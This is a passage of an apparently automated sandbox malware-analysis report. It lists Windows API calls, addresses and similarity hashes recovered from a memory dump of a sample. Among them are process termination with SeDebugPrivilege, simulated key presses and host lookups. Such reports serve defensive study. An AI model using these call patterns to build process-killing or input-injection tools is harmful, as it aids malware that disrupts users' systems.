                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B42F0A
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B42F28
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B42F2C
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B42F36
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B42F4E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B42F52
                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B42F5C
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B42F70
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B42F74
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 92f62d5b10c2665ec17b84bde10b129228d0a48493b1801085369a6e8186592d
                                                                                                                                                                                                                                                                                    • Instruction ID: 0d2bba82ac20e0253076b941a985675a2ebbcb3ee0a5a157db5d714293210030
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92f62d5b10c2665ec17b84bde10b129228d0a48493b1801085369a6e8186592d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB01D8307842107BFB106B689C8AF593FA9DF4DB61F500055F318AF1E0CDE16444DAA9
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B41D95,?,?,00000000), ref: 00B42159
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00B41D95,?,?,00000000), ref: 00B42160
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B41D95,?,?,00000000), ref: 00B42175
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00B41D95,?,?,00000000), ref: 00B4217D
                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B41D95,?,?,00000000), ref: 00B42180
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B41D95,?,?,00000000), ref: 00B42190
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00B41D95,00000000,?,00B41D95,?,?,00000000), ref: 00B42198
                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B41D95,?,?,00000000), ref: 00B4219B
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00B421C1,00000000,00000000,00000000), ref: 00B421B5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8bc9af364a60c33a3b09f2d7a05164402411f31a5313262aa7a36eff83ee7f41
                                                                                                                                                                                                                                                                                    • Instruction ID: a76dedbc488f6525f503f3145455fd24f354a1a1d09c764df898da9712388a56
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bc9af364a60c33a3b09f2d7a05164402411f31a5313262aa7a36eff83ee7f41
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D01A8B5240304BFE610ABA5DC49F6B7BACEB88751F414411FA09EB6A1CA709840CA20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00B4DDAC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00B4DDBA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DD87: CloseHandle.KERNEL32(00000000), ref: 00B4DE87
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6ABCA
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B6ABDD
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6AC10
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B6ACC5
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00B6ACD0
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6AD21
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                    • Opcode ID: f3e89630de846d844333910663c24bca69398a1d37b5a0650bbd3dfc4de1147a
                                                                                                                                                                                                                                                                                    • Instruction ID: 50a83a044c2980067ec243c508e63bc87276f07e36c99bb4ad6d300be62bd056
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e89630de846d844333910663c24bca69398a1d37b5a0650bbd3dfc4de1147a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4617970208241AFDB10DF15C994F29BBE1EF54308F5884DCE46A5BBA2CB75ED85CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B743C1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B743D6
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B743F0
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B74435
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B74462
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B74490
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                    • Opcode ID: 19bf79ae7a0ed59135d8865bf9e94767b2658d4c76de3901221fdd8d1f8e45da
                                                                                                                                                                                                                                                                                    • Instruction ID: f80756c1329ef238bdd58a0294294ec6baff756772bbad1b8201eb9ca4af507c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19bf79ae7a0ed59135d8865bf9e94767b2658d4c76de3901221fdd8d1f8e45da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F41C071900209ABDB219F64CC49BEA7BF9FF08350F114566F92CE7291D7719980DB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B4C6C4
                                                                                                                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00B4C6E4
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00B4C71A
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(012E5FF8), ref: 00B4C76B
                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(012E5FF8,?,00000001,00000030), ref: 00B4C793
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                    • String ID: 0$2
                                                                                                                                                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                    • Opcode ID: 9fe8f7333a5ecfc2a45e305ac0d9ac4870458ef87bc9e06c84c1777e0b1f9b52
                                                                                                                                                                                                                                                                                    • Instruction ID: ffba6506b42fbb900c17c330c5f8626e4f2d97371a27ce3ad27a7d70f33673d8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fe8f7333a5ecfc2a45e305ac0d9ac4870458ef87bc9e06c84c1777e0b1f9b52
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4651CF706022049BDF51CF68C8C8BAEBFF4EF54B58F24819AE81597291E7709E40EF61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00B4D1BE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                    • Opcode ID: 55a61253f89bd1208fabf11108e13bfa546343a49eecc6edaef5b5a00ed5320c
                                                                                                                                                                                                                                                                                    • Instruction ID: bed6cf17cbfc1a62d0b24367034716608b91c1a0f4120c24c6ef8ecc85b4c29e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a61253f89bd1208fabf11108e13bfa546343a49eecc6edaef5b5a00ed5320c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611B77538C306BAEB055F54DC82D6A7BECDF06760B2001EAFD05B62C1DBB46F406160
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                    • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                    • Opcode ID: c805e56ab3ad5a0eb5fa24f1f2771a20b1a2d117d320031856b3963524fe567c
                                                                                                                                                                                                                                                                                    • Instruction ID: e06a47d1844363a19b4e2d107c2e2e8363651de9da2e41200d335d8ceebb2410
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c805e56ab3ad5a0eb5fa24f1f2771a20b1a2d117d320031856b3963524fe567c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711B4719041157BDB246B64DC4AEEA7BFCEF01760F0000E5F655A7091EF74DF81A650
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 270b9bf38a69c4a1eaf6d49b07398274262d2d402a74dc56620a7ce17b62d8ab
                                                                                                                                                                                                                                                                                    • Instruction ID: 739def79a9122533c31c66f8578998a9915e4a12c6e9419b02d2ee59785bea7f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 270b9bf38a69c4a1eaf6d49b07398274262d2d402a74dc56620a7ce17b62d8ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41418165C10115A9DB11EBF88886ADFBBE8AF05310F5084A2E508E31A1FB34D761C3A6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00AFFC41
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00B3FC15
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00B3FC98
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e190abea14e9e1df5a0335a3302fdb3370ddb31dbd7f3c5ba050daa9e728401c
                                                                                                                                                                                                                                                                                    • Instruction ID: 855822b045c80385b265dfec1b15f214960057d719c625b31f4b883463d0be44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e190abea14e9e1df5a0335a3302fdb3370ddb31dbd7f3c5ba050daa9e728401c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41FB3150839D9EC7358B7889887397BF1EF46351F68457CFA4B47A60D631A881C711
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B737B7
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B737BF
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B737CA
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B737D6
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B73812
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B73823
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B76504,?,?,000000FF,00000000,?,000000FF,?), ref: 00B7385E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B7387D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9d0975a5a336780e8dcf0d35a0a7bff622d2da4537e66eda17ae6c31e25d794c
                                                                                                                                                                                                                                                                                    • Instruction ID: 6627d08db45307cf7c6090a9ea4ae307f79c24b989fac663a69412b492ce4cd5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d0975a5a336780e8dcf0d35a0a7bff622d2da4537e66eda17ae6c31e25d794c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41319C72211214BFEB158F50CC8AFEB3BA9EF49751F044065FE0DAB291CAB59C81C7A0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                    • Opcode ID: 02537663fb7f078b9765c8499266e2e6a64e7c9f15eb19afd0a820579a81f158
                                                                                                                                                                                                                                                                                    • Instruction ID: afcd5ad3ff30dca958b283f1c94ce9c17b48490cb38b680f2ef1dd0ce91fb6c5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02537663fb7f078b9765c8499266e2e6a64e7c9f15eb19afd0a820579a81f158
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD1BF71A0060A9FDB20CFA8C885EAEB7F5FF48304F1481A9E915AB290D774ED95CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B2194E
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B219D1
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00B21B7B,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21A64
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21A7B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21AF7
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B21B22
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B21B2E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
